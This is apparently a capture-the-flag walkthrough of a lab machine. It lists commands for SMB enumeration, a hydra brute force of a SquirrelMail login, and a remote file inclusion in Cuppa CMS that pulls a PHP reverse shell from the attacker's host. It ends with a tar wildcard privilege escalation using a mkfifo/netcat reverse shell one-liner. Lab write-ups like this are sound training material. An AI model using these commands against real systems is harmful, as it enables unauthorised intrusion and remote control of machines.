[Task 1] Deploy and compromise the vulnerable machine!

nmap -sV -sC 10.10.185.215
http://10.10.185.215/
dirb http://10.10.185.215
smbclient -L 10.10.185.215
smbclient //10.10.185.215/anonymous
smb: \> ls
smb: \> cd logs
smb: \logs\> ls
smb: \logs\> get log1.txt
cat log1.txt
http://10.10.185.215/squirrelmail/src/login.php
hydra -l milesdyson -P log1.txt 10.10.185.215 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

#1 What is Miles password for his emails?

cyborg007haloterminator
smbclient //10.10.185.215/milesdyson -U milesdyson
smb: \> cd notes
smb: \notes\> get important.txt
cat important.txt
http://10.10.185.215/45kra24zxs28v3yd/

#2 What is the hidden directory?

/45kra24zxs28v3yd
dirb http://10.10.185.215/45kra24zxs28v3yd
http://10.10.185.215/45kra24zxs28v3yd/administrator/
searchsploit cuppa
cat 25971.txt

#3 What is the vulnerability called when you can include a remote file for malicious purposes?

remote file inclusion

php-reverse-shell.php

curl http://10.10.185.215/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.3.38:8081/php-reverse-shell.php
nc -nlvp 4445
python -c 'import pty;pty.spawn("/bin/bash")'

#4 What is the user flag?

cat /home/milesdyson/user.txt

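Privilege Escalation (tar wildcard injection: the two file names created below are GNU tar options, so this presumably relies on the cron-run backup.sh expanding a `*` inside /var/www/html; the script's contents are not reproduced here. Server-side fix: archive `./*` or put `--` before the glob so file names are never parsed as options.)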

cat /etc/crontab
cat /home/milesdyson/backups/backup.sh
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.8.3.38 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
nc -nlvp 4443

#5 What is the root flag?

cat /root/root.txt